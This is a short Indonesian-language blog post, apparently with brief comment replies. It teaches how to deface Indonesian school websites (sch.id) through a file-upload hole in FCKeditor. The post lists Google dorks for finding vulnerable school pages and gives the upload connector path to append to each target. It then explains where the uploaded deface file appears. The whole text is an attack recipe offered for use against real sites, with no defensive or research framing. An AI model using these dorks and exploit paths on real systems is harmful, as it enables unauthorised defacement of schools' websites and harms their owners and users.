Okay gaiskali ini gue mau bagi bagi tutorial deface sch.id with fckeditor
langsung aja gan
bahan bahan nya :
Dork :
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?
Siapin file deface extensi .txt karna method ini cuma nerima txt
Exploit:
/editor/filemanager/connectors/test.html
1.sekarang lu dorking dulu di gugel
2.pilih target target nya lalu tambahkan exploit
/editor/filemanager/connectors/test.html
contoh:
jadi kek gini www.sitelu.sch.id/editor/filemanager/connectors/test.html
3. Liatin gambar ya
4.kalo vuln akan Muncul gambar kek gini Liat gambar di bawah :
5.buat akses shel nya di www.site.com/userfiles/file/namafilemu.txt
sekian dari gue gais :D
:*
ReplyDeletehi kaka :*
Delete